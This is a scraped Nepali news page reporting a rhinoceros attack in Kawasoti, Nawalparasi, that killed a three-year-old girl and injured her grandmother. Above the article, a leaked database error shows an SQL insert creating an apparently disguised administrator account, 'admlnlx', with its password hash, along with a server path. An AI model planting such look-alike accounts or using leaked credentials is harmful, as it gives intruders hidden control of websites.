WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByUrdQY4AyF9GQEu.DSH4jpxWb7rKP0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 03:50:47', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
नवलपरासीमा गैंडाको आक्रमणमा बालिकाको मृत्यु – Gaule Khabar

नवलपरासीमा गैंडाको आक्रमणमा बालिकाको मृत्यु

नवलपरासीमा गैंडाको आक्रमणमा बालिकाको मृत्यु

कावासोती,पुस १०-

गैंडाको आक्रमणबाट आइतबार बिहान जिल्लाको कावासोती नगरपालिका-१५ शेरगञ्जमा एक जनाको मृत्यु भएको छ भने एकजना घाइते भएका छन् ।

घरको आँगनमा आगो तापिरहेको समयमा गैंडाले आक्रमण गर्दा स्थानीय ३ वर्षकी सोयता महतोको मृत्यु भएको ईलाका प्रहरी कार्यालय कावासोतीले जनाएको छ । गैंडाको आक्रमणबाट मृतककी हजुरआमा ७० वर्षीया बुद्धिकुमारी महतो गम्भीर घाइते भएकी छन् । जाडोको समयमा आँगनमा नातिनीलाई लिएर आगो तापिरहेको समयमा गैंडाले आक्रमण गरेको हो ।

घाइते महतो उपचारका लागि मध्यविन्दु सामुदायिक अस्पताल डण्डा ल्याउँदै गर्दा बाटोमा नै मृत्यु भएको हो । घाइते बुद्धिकुमारी महतोको पुरानो मेडिकल कलेज भरतपुर चितवनमा उपचार भइरहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका